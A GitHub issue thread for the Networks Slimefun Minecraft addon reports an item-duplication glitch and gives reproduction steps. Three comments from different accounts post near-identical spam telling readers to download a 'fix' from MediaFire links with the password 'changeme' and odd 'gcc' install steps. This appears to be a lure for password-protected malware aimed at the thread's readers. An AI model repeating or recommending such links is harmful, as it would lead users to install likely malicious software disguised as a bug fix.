### ISSUE TITLE
[Bug] Dupe Item 4

### ISSUE THREAD

**Issue by balugaq** [Sefiraat/Networks#211]
You can reproduce it in any other Networks (Including the unoffical fixed version)
See [OneDriveLink](https://1drv.ms/u/c/a8b4ac746ac6bb41/EeUCk56DDt9Dmf72g2zJt2MB7Wsl22twBoQ0X--TFPcexg?e=0sWxHh)

Distinct from #188 #192 #201 

Primary Objective: Break & place slimefun block without player's interaction
Break Method: Similar to breaking bedrock, use some vanilla glitch to turn a slimefun block to the air, then place other slimefun block at the air until Slimefun drops a item at this location. Or you can make the programmable android robot go through the air (It won't drop a item).
Place Method: Block Placer (Some machines are disabled this method)

Steps to Reproduce the Issue:
1. Place the following items

Cell, Grid, Controller

2. Break the Cell
3. Place Small Fluffy Barrel in its place (You can try other slimefun machines lol)

Then, you can dupe.

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by TakeshiOver** [comment]
@balugaq you give me your discord?

**Comment by balugaq** [comment]
tinalness

**Comment by balugaq** [comment]
Fixed
